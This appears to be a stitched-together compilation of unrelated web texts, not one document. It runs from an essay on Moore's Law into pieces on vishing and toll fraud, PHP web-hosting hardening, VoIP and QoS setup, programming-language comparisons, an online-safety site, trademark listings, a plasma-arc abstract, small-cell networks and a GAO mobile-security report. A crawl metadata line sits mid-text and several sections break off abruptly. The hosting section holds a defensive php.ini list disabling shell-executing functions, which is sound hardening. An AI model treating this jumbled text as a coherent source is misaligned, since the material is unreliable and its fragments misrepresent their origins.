In April of 1965, Electronics magazine published an article by Intel co-founder Gordon Moore. The article and the predictions that it made have since become the stuff of legend, and like most legends it has gone through a number of changes in the telling and retelling. The press seized on the article's argument that semiconductor technology would usher in a new era of electronic integration, and they distilled it into a maxim that has taken on multiple forms over the years. Regardless of the form that the maxim takes, though, it is always given the same name: Moore's Law.
Moore's Law is so perennially protean because its eponymous formulator never quite gave it a precise formulation. Rather, using prose, graphs, and a cartoon Moore wove together a collection of observations and insights in order to outline a cluster of trends that would change the way we live and work. In the main, Moore was right, and many of his specific predictions have come true over the years. The press, on the other hand, has met with mixed results in its attempts to sort out exactly what Moore said and, more importantly, what he meant. The present article represents my humble attempt to bring some order to the chaos of almost four decades of reporting and misreporting on an unbelievably complex industrial/social/psychological phenomenon.
Because this article is quite lengthy, I've divided it into three parts. I've also provided links and summaries for each part below so that you can skip to the part that interests you most:
What was Moore's original formulation? It wasn't about increasing "computing power," and there was a bit more to it than just shrinking feature sizes. Exploring what Moore originally said will give us the opportunity to learn about the major factors that shape semiconductor manufacturing, and that ultimately shape what we can do with computers and much of modern life. Finally, I'll look at how Moore's observation morphed into the present media construction of "Moore's Law" as a statement about performance.
In this section, I'll look at the kinds of possibilities for computing advancement that Moore's Law opens up. Power consumption, flexibility, and a host of other issues come into play when we start looking at the variety of ways to exploit the ever increasing levels of integration that Moore's Law affords us. In the end, we'll see why Moore's Law is just as responsible for "smaller, cheaper and more efficient" as it is for "bigger, faster and more power hungry."
In the third and final part, we'll look at some of the challenges currently facing designers who would make use of increasing transistor densities to keep Moore's cost/integration curves marching downwards. In some markets, system architects are arguing that more integration isn't always better, and in other markets they're finding it increasingly difficult to mix all the different types of circuits that they'd like to include on a single die.
The way that "Moore's Law" is usually cited by those in the know is something along the lines of: "the number of transistors that can be fit onto a square inch of silicon doubles every 12 months." The part of Moore's original 1965 paper that's usually cited in support of this formulation is the following graph:
This graph does indeed show transistor densities doubling every 12 months, so the formulation above is accurate. However, it doesn't quite do justice to the full scope of the picture that Moore painted in his brief, uncannily prescient paper. This is because Moore's paper dealt with more than just shrinking transistor sizes. Moore was ultimately interested in shrinking transistor costs, and in the effects that cheap, ubiquitous computing power would have on the way we live and work. This section of the present article aims to give you a general understanding of the various trends and factors that Moore wove together to predict the rise of the personal computer, the mobile phone, the digital wristwatch, and other innovations that we now take for granted. Of course, I should note that Moore's original paper was only four pages in length, while the present article is much longer. This is because Moore presumed quite a bit more background knowledge about the semiconductor industry than most non-specialists have. Thus this article aims to give you enough background to understand Moore's reasoning.
If you read through Moore's paper, the closest you'll come to a quote that resembles "Moore's Law" is the italicized portion of the following section, subtitled "Costs and curves."
Reduced cost is one of the big attractions of integrated electronics, and the cost advantage continues to increase as the technology evolves toward the production of larger and larger circuit functions on a single semiconductor substrate. For simple circuits, the cost per component is nearly inversely proportional to the number of components, the result of the equivalent piece of semiconductor in the equivalent package containing more components. But as components are added, decreased yields more than compensate for the increased complexity, tending to raise the cost per component. Thus there is a minimum cost at any given time in the evolution of the technology. At present, it is reached when 50 components are used per circuit. But the minimum is rising rapidly while the entire cost curve is falling (see graph below). If we look ahead five years, a plot of costs suggests that the minimum cost per component might be expected in circuits with about 1,000 components per circuit (providing such circuit functions can be produced in moderate quantities.) In 1970, the manufacturing cost per component can be expected to be only a tenth of the present cost.
The complexity for minimum component costs has increased at a rate of roughly a factor of two per year (see graph on next page) [emphasis mine]. Certainly over the short term this rate can be expected to continue, if not to increase. Over the longer term, the rate of increase is a bit more uncertain, although there is no reason to believe it will not remain nearly constant for at least 10 years.
What exactly does Moore mean by "the complexity for minimum component costs"? And what is the relationship between manufacturing defects, costs and the level of integration? The answers to these two questions are a bit complicated, but I'll do my best to break them down in a reasonably understandable manner.
One good place to begin an explanation of the italicized phrase is by rewriting it in a way that unpacks it a bit:
"The number of transistors per chip that yields the minimum cost per transistor has increased at a rate of roughly a factor of two per year."
This way of putting it is a little better, but the sentence is still impossible to parse correctly if you don't understand the multiple factors that influence the relationship between the number of transistors that you can put on a chip and the cost per individual chip. The following section is aimed at giving you an appreciation of those factors, so that you can better understand Moore's original insight.
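To make the idea of a cost minimum concrete, consider a deliberately simplified sketch (the constants and the yield formula below are illustrative assumptions, not Moore's actual data): a finished chip's cost is roughly its share of a fixed wafer cost divided by the yield, and yield falls as more components are packed onto one chip. Dividing that chip cost by the component count gives a per-component cost curve with a clear minimum.

```python
# Illustrative model of the cost-per-component minimum (all constants are made up;
# only the shape of the curve matters).
import math

WAFER_COST = 100.0       # cost to process one wafer, arbitrary units
CHIPS_PER_WAFER = 500    # candidate chip sites per wafer (held constant here)
DEFECT_FACTOR = 0.002    # how quickly yield falls as complexity grows

def yield_fraction(components: int) -> float:
    """Fraction of manufactured chips that actually work."""
    return math.exp(-DEFECT_FACTOR * components)

def cost_per_component(components: int) -> float:
    """Cost of one component on a good chip at a given integration level."""
    cost_per_good_chip = WAFER_COST / (CHIPS_PER_WAFER * yield_fraction(components))
    return cost_per_good_chip / components

levels = range(10, 2001, 10)
best = min(levels, key=cost_per_component)
print(f"Cheapest point: about {best} components per chip, "
      f"{cost_per_component(best):.6f} units per component")
```

Improving the process corresponds to lowering DEFECT_FACTOR (and raising CHIPS_PER_WAFER): the whole curve drops and its minimum shifts to higher component counts, which is exactly the movement that "the complexity for minimum component costs" tracks from year to year.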
This article was first published on February 20, 2003.
Vishing and Toll Fraud
Vishing is closely related to phishing; the term refers to collecting private information over the telephone system.
Phishing itself is a relatively recent addition to the technical vocabulary. The main concept behind phishing is that an attacker sends an e-mail to a user that appears to come from a legitimate business. The user is asked to confirm his or her information by entering it on a web page: a Social Security number, a bank or credit card account number, a birth date, or a mother's maiden name. The attacker can then use the information the user provides for fraudulent purposes.
Vishing applies the same idea to the telephone system. Because many users trust the telephone more than they trust a web site, they will readily share confidential information over the phone. Educating users is the most common way to defend against vishing attacks.
Another kind of scam directed against telephony systems is called toll fraud. The basic idea of toll fraud is that an attacker uses the telephony system to place calls he should not be permitted to make. For example, a corporate telephony policy might state that personal long-distance calls are not permitted. If an employee ignored that policy and made a personal long-distance call, that would be a simple example of toll fraud.
More sophisticated forms of toll fraud involve exploiting a vulnerability in the telephony system itself to place calls. Cisco Unified Communications Manager has many features that help fight toll fraud. For example, partitions and calling search spaces can be used to control which phone numbers can be called from particular Cisco IP Phones, and a Forced Authorization Code (FAC) can be used to require a user to enter a code before calling a specific destination.
Different types of attacks can be directed at voice networks. In this series of articles we will discuss all four types of VoIP vulnerabilities and attacks, which is enough to explain how VoIP communication can be disabled or degraded in quality. The four main VoIP vulnerabilities are:
- SPIT – spam over IP telephony (SPIT) includes, for example, sending unwanted messages to an IP phone’s display or making the IP phone ring repeatedly.
- Vishing – just like phishing, except that the victim provides personal information over the telephone rather than on a website.
- Toll fraud – occurs when users misuse a telephone system to make toll calls (for example, international or long-distance calls) that they are not authorized to make.
- SIP attacks – exploit SIP’s use of well-known protocols to intercept or manipulate SIP messages. An attacker may also launch a DoS attack against a SIP server.
Learn Best Practices for Web Server Security
In this, the first of two articles, we will talk about securing the overall hosting environment, PHP (surprise), and file system permissions. Many people will try to sell you an "application firewall" or similar devices, but I tend to believe that's too reactive, and not enough of a proactive approach to security. Every little bit helps in security, but adding layers without addressing the underlying problem is asking for trouble.
The Environment We Must Live With
In the world of Unix, especially Linux, we must hold to some truths. There are specific file system permissions required for certain things to happen, we must allow some level of access to users' scripts and PHP applications, and we cannot lock things down as tightly as we'd like. I can create and thoroughly secure a Web server hosting static content, but how useful is that? The most secure Linux box is disconnected from the network, but again, it is not very useful. Somewhere, in between multiple extremes, there is a workable medium.
We aren't talking about a happy medium, notice. There is no happy medium in security. Keeping any platform secure is an iterative process, which involves multiple layers of security and constant maintenance.
Many companies, at least a few I've seen recently, have widely varying ideas about how to configure permissions for Web hosting users. The two basic schools of thought are: give every user their own group and a umask of 002, or require that the user maintain their own permissions, with a 022 umask.
In the first scenario, the benefit is that when collaborating, users never need to mess with permissions. Their umask will cause files to be written with group writable permissions, which is OK, because context matters. If they are writing files to a shared group resource, the parent directory will have the setgid bit set, and all files will be created with the same group id. Likewise, if they are in their own space, files will be written with the user's own group id. There are no obvious security holes here, but two issues quickly come to mind. First, this is training the user of the system to not pay attention to permissions at all. Second, certain security settings and third-party modules will not operate if files are group-writable, because the potential exists for malicious code to be introduced. If a single user's account in a group is compromised, the shared storage is as well.
The second scenario doesn't train users to ignore permissions, and allows modules like su_exec to run without hacking the source and commenting out the code that checks for group-writable files. In the end, the biggest concern regardless of the strategy to deal with collaboration among users, is that users will continue creating world-writable directories.
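As a concrete illustration of the first scheme, a shared project area might be prepared along these lines (the group name and path are hypothetical):

```
# hand the directory to the collaborating group and set the setgid bit
groupadd webteam
mkdir -p /srv/projects/site
chgrp webteam /srv/projects/site
chmod 2775 /srv/projects/site    # the leading 2 is the setgid bit

# each collaborator's shell then uses the group-friendly umask
umask 002
```

With the setgid bit set, files created inside the directory inherit the directory's group rather than the creator's primary group, which is what makes the 002 umask workable for collaboration.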
Many Web applications, even popular ones, tell the user to 'chmod 777' as part of the install process. That's fine, but they never tell them to fix the permissions after the installation process! Increasingly, especially in the .edu world, I've seen more and more malicious scripts actively looking for world-writable directories. A compromise of a single site on a server often leads to many sites having unauthorized content written to them.
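A quick way to audit for this (a sketch, assuming a document root under /var/www) is to search for anything world-writable:

```
# directories anyone on the system can write into
find /var/www -type d -perm -0002 -ls

# world-writable files are just as dangerous
find /var/www -type f -perm -0002 -ls
```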
Of course, we cannot talk about Web security without mentioning PHP, the bane of Web hosting.
PHP scripts are generally interpreted via the mod_php Apache module. This means that PHP scripts written by a user will run as the Web server user. This standard configuration causes many issues with file permissions. What if a Web developer wants to connect to a database? They must provide a password, and the file containing the password must be readable by the Web server. Since the Web server runs all scripts as the same user (it's running PHP itself), all users on the system can access this information via their own PHP scripts. There must be a better way.
And indeed, if you're running mod_suexec, you can execute CGI programs as the user that owns them. Apache will run a program as root, which detects what user it should switch to based on the owner, and then runs the CGI as that user. PHP scripts, on the other hand, cannot be handled this way unless you're running Apache as root (don't). The workaround, since suphp doesn't really work, is to run all PHP applications as a CGI program. There's quite a performance hit, but the benefits provided by running PHP applications as the user that owns them far outweigh the performance concerns—buy more servers and be done with it.
With user-run PHP scripts, you can easily identify which user's application is at fault when someone has executed a script that spams or launches a DoS attack.
This is one step closer to managing the problem, but we're still not doing anything about the initial attack vector. Two problems exist: insecure PHP settings, and insecure applications. The entire next article will be devoted to insecure applications.
PHP settings are tricky. Most downloadable applications, especially the popular blogs or CMSes, will break if you rein in PHP too tightly. Setting safe_mode, for example, will break most PHP. Dallas Kashuba of Dreamhost was kind enough to share with me some PHP settings they use for the few customers that use mod_php. The set of most dangerous PHP functions, ones that should be disabled, are:
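A typical set, expressed as php.ini directives, looks like the following; the exact functions worth disabling vary by host and by which applications must keep working, so treat this as an illustration rather than a definitive list:

```
; keep user scripts away from the shell (illustrative, not exhaustive)
disable_functions = exec, system, shell_exec, passthru, popen, proc_open, show_source

; confine each site's file access to its own tree (example path)
open_basedir = /home/username/public_html:/tmp
```

Anything that spawns a shell is the first candidate for disable_functions; open_basedir is a separate, complementary restriction on where scripts may read and write.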
One final note: an extremely useful module available for Apache is mod_security. Very much like an application firewall device does, mod_security will inspect every transaction and compare it to a list of possible attacks. The rules by which it blocks exploits must be constantly updated, but it's certainly worth the care and feeding.
It's all about minimizing the likelihood of break-ins, and then minimizing the impact they can have. There are many more aspects to securing a server in a multi-user environment, which I briefly wrote about previously in, "Keeping a Lid on Linux Logins." Carla Schroder also introduces SELinux, in "Tips For Taming SELinux."
As much as we'd like to prevent security incidents in the Web hosting world, we have come to face the reality that they will happen. Come back next week to learn about managing the major problem: the applications themselves.
Internet telephony – What is it and how does it work?
The terms IP telephony (IP = Internet Protocol) and Voice over IP (in short: VoIP) refer to making telephone calls via a computer network, whereby the data is transferred according to the IP Standard. This form of telephony is better known as internet telephony. It is necessary to prepare data for transfer via the internet to comply with the rules of the Internet Protocol. The transfer routes used here are the same as those employed for standard data transferral via the internet.
With internet telephony from NFON it is possible to integrate Unified Communication (UC) as well as fax solutions via XCAPI.
Internet telephony hardware
In order to use internet telephony one requires the appropriate hardware, and four different alternatives are available. The first option is to use a standard computer with a microphone to capture the user's voice, plus a loudspeaker or headphones to hear the other participants; in addition, special softphone software must be installed on the PC. Secondly, it is possible to use dedicated VoIP end devices such as IP and SIP telephones. These only differ from a standard telephone in terms of the technology that enables the data transfer via the internet. As a further option it is possible to use a conventional telephone and connect it to a special adapter, which converts the analogue telephone data into digital signals. Finally, it is also possible to use a mobile phone by connecting through the telephone system via an FMC client. The advantage of the last three options lies in the operation of the device, which can be used in the same way as a conventional telephone. A further benefit is that the user remains reachable even when the PC is switched off.
How VoIP works
First, the acoustic signals are digitalised during the data transfer, and divided up into individual data packages. These data packages are subsequently labelled with a so-called header. These headers contain information about the identity of the sender and recipient, or regarding the status of the message. It is now necessary to establish a connection. To do so one uses a Session Initiation Protocol Address (in short: SIP address). This is only assigned once, so that it is possible to uniquely identify the address. Activating the device results in this logging into a server. The server then registers the login. If this SIP address is called up by another participant then this request is passed on to the server that the user is registered with. The server passes the call on to the end device and therefore establishes a telephone conversation. Because the SIP address is not bound to a certain connection - in the manner of a standard telephone number - the user is connected with the internet by means of the corresponding end device and is therefore attainable anywhere in the world. It is now also possible to connect internet telephony with the standard telephone network. This takes place via certain gateways. This provides the user with the option of using a conventional telephone in order to call a VoIP telephone and vice versa. The so-called Media Gateway can be used for example with an ISDN connection or likewise with an analogue telephone connection.
The advantages of VoIP
The first noteworthy advantage here is that internet telephony is a particularly low-cost option, because almost every household has flat rate internet nowadays. Therefore, no further costs arise because IP telephony simply accesses this. This means that the standard telephone connection is superfluous and can even be removed. The costs of the individual telephone calls are usually also lower here than with analogue telephony. Telephone conversations with participants using the same VoIP provider are usually free of charge. It is also often the case that calling participants using alternative VoIP providers is also free; only in a few cases are fees charged here. However, calls placed within the standard telephone network are always subject to charges, although these are very low with many providers.
Practical Python for Network Engineers
Topic: Input and Output
Python is becoming the de-facto standard for the Software Driven Networking world. From full-blown SDN controllers to simple network device queries, it is the language of choice for companies large and small due to its simplicity and maintainability. Even with its beginner-friendly mantra, it is a fully powerful language that supports the infrastructure of companies like Google and Netflix. The course aims to bring a previously CLI-focused network engineer up to speed on Python programming basics. Unlike other Python introductory courses, this course gives practical examples in each lesson of how the covered material applies to the tasks of a network engineer. At the end of the course, the participant will be able to write basic scripts and begin to utilize libraries such as Pexpect, Ansible, Paramiko and others.
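As a taste of what such scripts look like, here is a minimal Paramiko sketch that logs into a device over SSH and runs a single show command; the address and credentials are placeholders:

```python
# Run one command on a network device over SSH using Paramiko.
import paramiko

HOST = "192.0.2.10"     # placeholder management address
USERNAME = "admin"       # placeholder credentials
PASSWORD = "changeme"

client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())  # fine for a lab, not for production
client.connect(HOST, username=USERNAME, password=PASSWORD, look_for_keys=False)

stdin, stdout, stderr = client.exec_command("show version")
print(stdout.read().decode())

client.close()
```

Note that some network platforms do not support the SSH exec channel that exec_command uses, in which case an interactive session via invoke_shell() is the usual fallback.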
A quick definition of the term “Real-Time” is in order here. Probably the best way to explain this is by subtraction, or by explaining what it is not.
Consider the timings behind the process of sending and receiving an email message. Email is occasionally described as a “store and forward” protocol, and even though it is not absolutely correct to classify it this way (refer to the Wikipedia definition), it does render the idea that there is commonly a measurable delay between the composition plus sending of an email, and the eventual reception and reading of that same email.
This delay between sending and receiving is largely irrelevant for email delivery, and in the vast majority of cases, nobody really cares about the delay – particularly keeping in mind that a person’s mailbox can receive several messages in a very short span of time, making it impossible for the reader to process the contents immediately.
In summary, if an email is delayed by a few minutes, the impact on operations is virtually nil.
Voice communications, on the other hand, are of a completely different nature. During the course of a phone call, a propagation delay of more than around 400 milliseconds is immediately noticeable to the participants, and will severely impact the perceived call quality.
Assuming that your internet and networking services have sufficient bandwidth generally to carry your voice traffic, it is fairly safe to conclude that whenever you encounter call quality issues of this type, the cause is due to some point of the network being sufficiently overworked, or congested. This introduces additional delay beyond the normal propagation delay (which most people call “ping time”).
What is QoS?
Quality of Service, in the context of VoIP, is a collection of concepts and techniques that come together to provide a means to safeguard optimum call quality within the constraints of the limited bandwidth available.
Bandwidth Reservation – This mechanism, sometimes found on entry-level routers, simply reserves a certain percentage of the available bandwidth for classified traffic. If, for example, you reserve 100kbps, of the 2000kbps bandwidth available, for VoIP traffic, then even during times when other traffic is competing for bandwidth, the router will guarantee bandwidth for VoIP; if the VoIP traffic requests 50kbps, then the router will fully satisfy all VoIP traffic requests, and the remaining bandwidth will be utilised for other traffic; If the VoIP traffic requests 300kbps, then the router will guarantee 100kbps for VoIP, while the remaining traffic competes for the remaining bandwidth.
Traffic Tagging – Network traffic can be tagged with special markers to indicate priority levels. The mechanism is documented in RFC 2474, and it defines the “Differentiated Services” field in IPv4 and IPv6 headers for traffic classification purposes. Note that this mechanism is simply a way to mark packets so any routers or hops involved in the flow of traffic may implement specific behavior relevant to the class of traffic, with the behaviour typically being one of prioritizing the traffic based on class. If you need to implement QoS, your task will involve configuring your VoIP devices, particularly your 3CX machine, to tag VoIP traffic appropriately for routing devices to action accordingly. On Windows-based Operating Systems, this is implemented at Local Policy or Group Policy level, and at the end of this chapter you have a simple example to implement QoS tagging on Windows 2008 or 2012 Server.
Prioritization – Tagging traffic is only a part of the solution. You will also need to make sure that all intervening devices and services prioritize the tagged traffic. In particular, you should ensure that your Internet Service Provider does honour tagged traffic, and that it will prioritize accordingly.
Typical Congestion Points
To better understand how to address network congestion, some pointers on “where to look” can come in very handy. What follows is not a completely exhaustive list, but certainly a great starting point.
WAN-to-LAN device (Router/Firewall)
Even though internet connectivity continues to improve practically everywhere, the available bandwidth remains a limited resource.
Your first sanity check should always be to ensure that you are not attempting to deliver more calls across your internet connection than your bandwidth can handle. Most internet connections are asymmetrical – meaning that the download and upload bandwidth availability is NOT the same. Typically, upload bandwidth is significantly lower than download bandwidth, and therefore it is generally the upload bandwidth that is your limiting factor (bottleneck). This is because a voice conversation requires voice data to be sent and received simultaneously.
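A rough capacity check makes the point; the figures below assume the common G.711 codec at about 64 kbps of voice payload per direction plus packet overhead, and the exact numbers vary with codec, packetization interval and link type:

```python
# Rough estimate of how many concurrent G.711 calls fit in a given upload link.
PAYLOAD_KBPS = 64.0      # G.711 voice payload, one direction
OVERHEAD_KBPS = 23.0     # approximate IP/UDP/RTP and Ethernet overhead at 20 ms packets
PER_CALL_KBPS = PAYLOAD_KBPS + OVERHEAD_KBPS   # roughly 87 kbps each way

upload_kbps = 1000.0     # example: a 1 Mbps upload
headroom = 0.75          # leave a quarter of the link for everything else

max_calls = int(upload_kbps * headroom / PER_CALL_KBPS)
print(f"About {max_calls} simultaneous calls fit in {upload_kbps:.0f} kbps of upload")
```

Because a call sends and receives at the same rate, the same per-call figure must fit in the download direction too, but on a typical asymmetric connection it is the upload side that runs out first.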
One simple way to try to confirm that the congestion point is at the WAN-to-LAN device is to check that:
- A voice call that travels over your internet connection experiences call quality issues.
- A voice call that does NOT travel over your internet connection (typically by making an extension to extension call where both extensions are on the same LAN as your PBX) does NOT experience call quality issues.
If the answer to both questions is “yes”, then it is fairly sure that the congestion point is your WAN-to-LAN device.
Desk Phones used as Mini-Switches
Many SIP desk phones today offer the added convenience of a second ethernet port, allowing you to daisy-chain a PC to the LAN through the phone, reducing the number of network points that you need to deploy into your premises.
Certain situations, however, can give rise to seemingly unexplained call quality issues. These symptoms are typically intermittent, experienced only by one user at any point in time, with no real difference between whether the call is to another LAN extension or to an external caller.
- Most calls seem fine.
- Some calls have call quality issues throughout.
- Some calls start off ok, with call quality degrading at some point during the call.
- Some calls start with bad call quality, with the problem disappearing during the call.
This can sometimes be traced to the fact that the PC connected to the Desk phone in question is making sufficient use of the network to overwhelm the processing power of the phone. You can confirm this by disconnecting the PC from the phone.
Internal LAN Devices
Certain network layouts can also occasionally expose symptoms very similar to the ones described above with a PC connected to a Desk phone. This time however, the incident is very likely to be related to intermittent very high network usage. More susceptible than others would be environments requiring transmission of very large documents over the network – a graphics design house, for example.
If your LAN is composed of two or more sites linked together over an MPLS network, these symptoms can manifest themselves more than over a conventional LAN.
Arguably, the best way to address this type of scenario is to implement QoS on the LAN, by implementing traffic tagging on VoIP devices (including your IP-PBX) and by ensuring that your switches and routers are correctly configured to prioritize traffic based on the traffic tags.
For some interesting reading on this topic, you may wish to refer to Donald Egbenyon’s Bachelor Thesis, Turku University of Applied Sciences:
If you are using WiFi devices inside your premises, do keep in mind that each Access Point has a limited coverage area, and that a WiFi device that moves from one Access Point to another will need some time to "roam" across. This can take long enough to drop a call and require your WiFi device to re-register itself with 3CX.
You may need to investigate a WiFi infrastructure that reduces the handoff process to no more than milliseconds to avoid such situations. This is typically achieved by using multiple Access Points that present the WiFi device with a single WiFi zone, while the back end takes care of managing which Access Point will provide the service.
A Word About VLANs
For most network engineers, the preferred sure-fire way to handle potential issues of competition for bandwidth between Voice and Data is to keep the different traffic types separate, by segregating Voice into its own LAN using a physically separate network of switches, or using VLANs to achieve the same scope.
While this is most certainly a very effective way of approaching the challenge, you must keep in mind that the concept of Unified Communications is to bring about a convergence of Voice and Data. In particular, a user who runs a VoIP application on his desktop computer (a 3CX client being an excellent example) immediately brings about the need for Voice and Data to travel on the same LAN – and the trend is certainly making this the “normal” way to work.
You may find that QoS on the LAN brings about better returns when addressing such issues.
Configuring QoS on Windows
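On Windows, the built-in Policy-based QoS feature is the usual starting point: in the Group Policy editor it lives under Computer Configuration > Windows Settings > Policy-based QoS, where a policy can stamp a DSCP value onto matching outbound traffic. On Windows Server 2012 the same thing can be scripted with PowerShell; the port ranges and DSCP value below are only an example and should be adjusted to match your own SIP and RTP settings:

```powershell
# Tag SIP signalling and RTP media leaving this server with DSCP 46 (Expedited Forwarding).
New-NetQosPolicy -Name "VoIP-SIP" -IPProtocolMatchCondition UDP `
    -IPDstPortStartMatchCondition 5060 -IPDstPortEndMatchCondition 5061 -DSCPAction 46

New-NetQosPolicy -Name "VoIP-RTP" -IPProtocolMatchCondition UDP `
    -IPDstPortStartMatchCondition 9000 -IPDstPortEndMatchCondition 10999 -DSCPAction 46
```

Remember that the DSCP marking only helps if the switches, routers and, where relevant, your provider are configured to honour it; marking without prioritization changes nothing.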
When all you have is a hammer, they say, everything looks like a nail. Instead, we give you a look at several language-hammers, so you can make a reasonable decision about when each is the best tool for the job.
Deciding when to use any language—including Ruby—depends on the appropriateness to task and the amount of yak shaving necessary. Zed Shaw explains when Ruby's MRI or JRuby is the best language for the job, and when it really isn't.
Python is a powerful, easy-to-use scripting language suitable for use in the enterprise, although it is not right for absolutely every use. Python expert Martin Aspeli identifies when Python is the right choice, and when another language might be a better option.
PHP may be the most popular Web scripting language in the world. But despite a large collection of nails, not every tool is a hammer. So when should it be used, and when would another dynamic programming language be a better choice? We identify its strengths and weaknesses.
Zend's John Coggeshall responds to CIO.com's earlier PHP article with his own list of the Good, the Bad and the Ugly of PHP application development.
Every programming language has its strengths...and its weaknesses. We identify five tasks for which perl is ideally suited, and four that...well, really, shouldn't you choose something else?
Last week, Montana Attorney General Mike McGrath announced a new Web site, www.safeinyourspace.org, designed to educate young people -- and the adults in their lives -- about some of the kinds of dangers they might face online.
McGrath made the announcement at an event at the Attorney General's Office in Helena. He was joined by Superintendent of Public Instruction Linda McCulloch and representatives of the Montana Safe Schools Center at the University of Montana. The site was designed in cooperation with the center.
"We think this site will help start the conversation between young people and the adults in their lives," McGrath said. "Safe in YourSpace encourages children, parents and teachers to talk with one another about how to stay safe online."
"The Internet is a valuable educational tool that gives students access to resources around the world," McCulloch said. "This Web site will help educate students, parents, educators and community members on ways to keep our students safe while they are surfing the Web at home or at school."
The site has specific information for teens, parents and teachers. It covers a variety of topics, including cyberbullying, Internet predators and technical issues for teachers. The section for teens has information and tips on e-mail, instant messaging, social networking and peer-to-peer networking. It also includes a glossary of terms and links to state and national organizations.
McGrath noted that sometimes, young people are more technically savvy than their parents.
"We know kids are going to use technology, and we need to encourage that," he said. "But while young people may know how to navigate pages and sites, they don't necessarily know how to make good decisions about some of what they face on the Net."
The Safe Schools Center at the University of Montana has provided training with the National Center for Missing and Exploited Children and i-SAFE, a nonprofit foundation that focuses on Internet safety.
"Online predation, identity theft, cyberbullying - these are issues young people have to be prepared for on a daily basis," said Rick van den Pol, director of the Safe Schools Center. | <urn:uuid:39aceea7-e9f9-457c-aefb-91189bcddac5> | CC-MAIN-2017-09 | http://www.govtech.com/security/New-Montana-Cyber-Safety-Web-Site.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173872.97/warc/CC-MAIN-20170219104613-00351-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.967745 | 436 | 2.75 | 3 |
CLEAN Technology INC. | Date: 1997-02-11
recycled plastic in the form of pellets and flakes for use in manufacturing and for general industrial use.
CLEAN Technology INC. | Date: 1994-09-16
food grade recycled plastic in the form of pellets and flakes for use in manufacturing and for general industrial use.
Clean Technology Inc. and Plastipak Packaging Inc. | Date: 1991-12-24
Clean Technology LLC | Date: 2008-10-21
Li T., Choi S. and Watanabe T. (Tokyo Institute of Technology); Nakayama T. and Tanaka T. (Clean Technology Co.)
Thin Solid Films | Year: 2012
Arc discharge with argon and nitrogen was generated across the long electrode gap distance of 400 mm to produce a stable thermal plasma and large volume with low power under atmospheric pressure. In the case of nitrogen as plasma forming gas, an increase of the gas flow rate increases the arc voltage, thus the center temperature of the arc column reached higher. For the argon arc, the arc voltage decreases with increasing gas flow rates. Due to the arc constriction in both cases of nitrogen and argon, the center temperature of the arc column increases under the constant current. The result of emission intensity distribution across nitrogen arc column reveals that the arc column diameter increases with increasing gas flow rate because of the increase of the input power. On the other hand, in the argon arc, the diameter decreases by strong thermal pinch in large flow rate of argon. The measured excitation temperature is uniform along with axial direction of the arc column which is an important feature for waste materials processing due to the long direct current arc plasma that provides long residence time for injected materials. © 2012 Elsevier B.V. All rights reserved.
Most of us remember when femtocells were the “next big thing” in wireless services. In the early days, small-cell solutions emerged as tools for addressing gaps in wireless coverage. Today, small-cell technology is (rightfully) being repurposed to address the ever-pressing issue of mobile-bandwidth shortage. It certainly has great potential, but even with carriers aggressively pursuing small-cell deployments, it remains unclear which models and strategies will be successful.
The business case for exploiting small-cell technologies for scale-based infrastructure enhancement is simple: Growth in mobile-data consumption threatens to outpace the rate at which carriers can add capacity in the form of traditional cell towers. The small-cell solution, which today exists in several versions, with effective ranges between 50 and 5,000 feet, allows carriers to replicate the connectivity of cell towers on a much smaller scale. While these smaller cells can’t handle the capacity of a full-scale (or macrosite) cell tower, they can be deployed in greater numbers, creating antenna arrays that provide substantial capacity. Additionally, unlike macrocell cites, small cells are relatively discreet and can be mounted in densely populated locations and urban environments.
Carriers are counting on small cells to deliver, with nearly all (98 percent) mobile operators viewing small-cell applications as essential to the future of their networks, according to a recent study by Informa Telecoms & Media. Further, nine of the world’s 10 largest wireless operators have deployed small cells. Just last month, AT&T announced that it will spend $8 billion on wireless initiatives to blanket 300 million people with coverage by year-end 2014 through small-cell enhanced LTE network strategy. The company’s strategy calls for the deployment of more than 1,000 distributed antenna systems as well as leveraging 40,000 small cells to move traffic to AT&T’s fiber networks. In other words, with no clearly successful model in the market yet, AT&T is adopting the heterogeneous network (HetNet) model in which it will use of a variety of radio and hardware technologies to achieve maximum network capacity and density.
Sprint has similar plans, anchored by a large-scale rollout of picocells next year, in highly trafficked environments (think airports and stadiums). Verizon has not yet detailed its small-cell plans, but reportedly sees small-cell solutions as being more applicable in some settings (e.g., dense urban) than others.
Still, the drive forward by two major carriers, which comes as the carrier world at large continues to address the practical challenges of small-cell deployments, including security, interference, synchronization and backhaul, underscores the pressure carriers face with respect to mobile data demand. Even though challenges remain with respect to small cells, demand is great enough for forward-thinking carriers to pursue deployment strategies while kinks are being worked out. In this column, we previously addressed the reality that, with market-leading devices and platforms reaching across all carriers and networks, competition is moving from device availability to network performance. Major small-cell builds starting next year for AT&T and Sprint are clear signals this shift has already occurred.
This analysis originally appeared in B/OSS Magazine.
Part of the issue is the fact that consumer security awareness is not at the level that it should be, the GAO said, and federal efforts to help have so far been lacking.
The GAO report noted that cyber criminals may use a variety of attack methods, including intercepting data as they are transmitted to and from mobile devices and inserting malicious code into software applications to gain access to users’ sensitive information. Premium SMS scams are on the rise, and there’s also just good old-fashioned phishing and teasing to malicious links at a website.
These threats and attacks are facilitated by vulnerabilities in the design and configuration of mobile devices, as well as the ways consumers use them, the GAO noted. Common vulnerabilities include a failure to enable password protection and operating systems that are not kept up to date with the latest security patches.
The GAO said that protection will have to be a multi-pronged effort that takes into account all parties. For instance, mobile device manufacturers and wireless carriers can implement technical features, such as enabling passwords and encryption to limit or prevent attacks. Meanwhile, consumers can adopt key practices, including setting passwords, using two-step authentication and limiting the use of public wireless connections for sensitive transactions, which can significantly mitigate the risk that their devices will be compromised. Unfortunately, many consumers still do not know how to protect themselves from mobile security vulnerabilities, raising questions about the effectiveness of public-awareness efforts.
Meanwhile, federal agencies and private companies have promoted secure technologies and practices through standards and public-private partnerships. But the GAO said that despite these efforts, safeguards have not been consistently implemented.
For instance, the Federal Communications Commission (FCC) has facilitated public-private coordination to address specific challenges, such as cellphone theft. However, it has not yet taken similar steps to encourage device manufacturers and wireless carriers to implement a more complete industry baseline of mobile security safeguards.
When it comes to consumer awareness, neither the Department of Homeland Security (DHS) or the National Institute of Standards and Technology (NIST) have yet developed performance measures or a baseline understanding of the current state of national cybersecurity awareness that would help them determine whether public awareness efforts are achieving stated goals and objectives.
